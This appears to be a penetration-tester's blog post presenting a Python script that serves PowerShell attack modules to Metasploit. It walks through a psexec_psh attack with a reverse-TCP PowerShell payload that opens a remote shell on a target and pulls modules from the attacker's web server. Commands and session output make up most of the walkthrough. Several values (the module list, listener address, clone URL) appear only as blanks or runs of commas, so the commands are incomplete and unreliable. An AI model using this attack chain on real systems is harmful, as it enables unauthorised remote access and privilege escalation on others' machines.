Interactive Powershell in Metasploit

The fine folks over at Netitude were recently able to get interactive powershell payloads in Metasploit. With the ever growing arsenal of Powershell tools out there, this is huge! Thanks to Ben Turner and David Hardy for their excellent work.

More recently, Larry Spohn over at TrustedSec, wrote up a great post that shows how one could use sed and Apache to make practical use of these new payloads. There is nothing wrong with Larry's method for hosting and loading your PowerShell repository into MSF, but I figured this could all be done in one step. In that spirit, I put together a Python script named "powerserver" to accomplish this.

Running the script is simple, just feed it your PowerShell Module directory path and hosting IP information. The script will move into the directory you specified, walk over it and parse out all of the .ps1 files; it'll then print out a handy list you can copy and paste directly into MSF.

python powerserver -p /path/to/powershell_scripts -i [ip_address]:[port]


awh@jabberwock:~/$ python -p /opt/PowerTools/ -i
[*] Directory found

[*] Copy and paste the below to MSF:,,,,,,,,,,,,,,,,

[*] Now starting webserver

[*] serving at port 8080

With our Python SimpleHTTPServer up and running, we can configure Metasploit. For simplicity, I'm using the "psexec_psh" module in MSF and I'll be using the x64 bit Interactive Powershell Payload.

Set the payload to any of the interactive powershell payloads:

msf exploit(psexec_psh) > show options


Payload options (windows/x64/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST    yes       The listen address
   LOAD_MODULES                   no        A list of powershell modules seperated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

You can preload your modules, with the list that the script generated. Simply set the "LOAD_MODULES" option:

msf exploit(psexec_psh) > set LOAD_MODULES,,,,,,,,,,,,,,,,
LOAD_MODULES =>,,,,,,,,,,,,,,,,

msf exploit(psexec_psh) > exploit

[*] Loading 17 modules into the interactive PowerShell session
[*] Started reverse SSL handler on 
[*] - Executing the payload...
[+] - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 3 opened ( -> at 2015-07-21 11:36:59 -0600

Windows PowerShell running as user BOB$ on TESTBOX1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

[+] Loading modules.

PS C:\Windows\system32>

Awesome, and with our shell we should be able to see one of the PowerTools scripts:

PS C:\Windows\system32>get-help get-serviceperms

    Returns a list of services that the user can modify.
    Get-ServicePerms [<CommonParameters>]
    This function enumerates all available services and tries to
    open the service for modification, returning the service object
    if the process doesn't failed.


    To see the examples, type: "get-help Get-ServicePerms -examples".
    For more information, type: "get-help Get-ServicePerms -detailed".
    For technical information, type: "get-help Get-ServicePerms -full".

PS C:\Windows\system32> 

Installing is easy, peasy, lime and squeezy:

git clone

Beware the JabberWock, my son!


Show Comments